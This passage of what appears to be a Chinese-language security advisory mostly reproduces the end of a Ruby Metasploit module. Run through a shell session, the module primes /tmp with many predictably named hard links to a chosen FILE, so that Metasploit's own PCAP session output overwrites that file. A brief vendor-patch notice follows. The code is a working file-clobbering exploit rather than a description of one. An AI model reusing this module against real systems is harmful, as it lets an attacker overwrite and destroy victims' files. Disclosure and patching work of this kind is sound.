))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
], self.class)
end
def link(t)
file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
"msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end
# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+i)
end
print_status("Set #{datastore['NUMBER']} links.")
end
def cleanup
print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Metasploit Framework
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: